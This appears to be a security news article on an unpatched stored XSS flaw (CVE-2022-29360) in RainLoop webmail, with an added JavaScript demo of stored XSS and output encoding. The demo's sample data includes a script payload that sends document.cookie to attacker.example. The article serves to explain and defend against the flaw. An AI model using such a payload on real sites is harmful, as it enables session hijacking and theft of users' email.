An unpatched high-severity security flaw has been revealed in the open-source webmail client RainLoop that may be weaponized to siphon emails from victims’ inboxes.
“The vulnerability of the code […] can be easily exploited by an attacker sending a malicious email to a victim using RainLoop as an email client,” Simon Scannell, a security researcher at SonarSource, said in a report published this week.
“When the email is viewed by the victim, the attacker takes full control of the victim’s session and can steal any of their emails, including those containing highly sensitive information such as passwords, documents, and password reset links.”
Tracked as CVE-2022-29360, the flaw is a stored cross-site scripting (XSS) vulnerability affecting the latest version of RainLoop (v1.16.0), which was released on May 7, 2021.
Stored XSS flaws, also known as persistent XSS, occur when attacker-supplied input (a comment field, a profile name, or, as here, the contents of an email) is saved by the target web application, typically in a database, and later rendered to other users without proper output encoding, so the browser executes the embedded script in the context of the victim's session.
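The following is an added illustration of that pattern, not RainLoop code and not taken from the SonarSource report. It stores a constructed attacker payload in an in-memory array that stands in for the database, then renders it two ways: by concatenating the stored text straight into HTML (the stored-XSS bug) and by HTML-encoding every user-controlled value first. The `containsActiveMarkup` check is a crude demo-only heuristic for showing the difference; it is not a sanitizer.

```javascript
// Added example: how stored XSS arises and how output encoding neutralises it.
// The "database" is an in-memory array; the payload below is constructed for the demo.

// Minimal persistence layer standing in for a real database.
const commentStore = [];

function saveComment(author, body) {
  // The server stores attacker-controlled text verbatim. Storing it is not
  // the bug; rendering it later without encoding is.
  commentStore.push({ author, body });
}

// Vulnerable renderer: stored user data is concatenated straight into HTML,
// so a stored <script> tag is emitted as live markup to every viewer.
function renderUnsafe() {
  return commentStore
    .map((c) => `<li><b>${c.author}</b>: ${c.body}</li>`)
    .join("\n");
}

// Encode the five characters that carry meaning in HTML text and attribute
// contexts so the browser treats stored data as text, not markup.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened renderer: every user-controlled value is encoded for the HTML
// text context it is placed into, at the point of output.
function renderSafe() {
  return commentStore
    .map((c) => `<li><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.body)}</li>`)
    .join("\n");
}

// Demo-only heuristic: does the rendered output still contain something a
// browser would execute? A real test would load the HTML in a browser or jsdom.
function containsActiveMarkup(html) {
  return /<script\b|on\w+\s*=|javascript:/i.test(html);
}

// Constructed sample data: one benign comment and one attacker payload that
// exfiltrates the session cookie to a hypothetical attacker host.
saveComment("alice", "Looks good to me");
saveComment(
  "mallory",
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
);

console.log("unsafe output executes script:", containsActiveMarkup(renderUnsafe()));
console.log(renderUnsafe());
console.log("safe output executes script:", containsActiveMarkup(renderSafe()));
console.log(renderSafe());
```

Encoding everything is the right fix for plain-text fields, but a webmail client has to display HTML mail, so it cannot simply escape the whole message body; the usual defence there is a DOM-based allowlist sanitizer (removing scripts, event-handler attributes and `javascript:` URLs before insertion) combined with a restrictive Content Security Policy. That is general practice, not a description of how RainLoop or SnappyMail handle it.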
SonarSource, in its disclosure timeline, said it notified the RainLoop maintainers of the bug on Nov. 30, 2021, and that the software maker has not released a fix in more than four months since.
An issue raised on GitHub by the Swiss code quality and security company on December 6, 2021, remains open to date. We’ve reached out to RainLoop for comment, and we’ll update the story if we hear back.
In the absence of patches, SonarSource recommends that users migrate to SnappyMail, a fork of RainLoop that is actively maintained and unaffected by the security issue.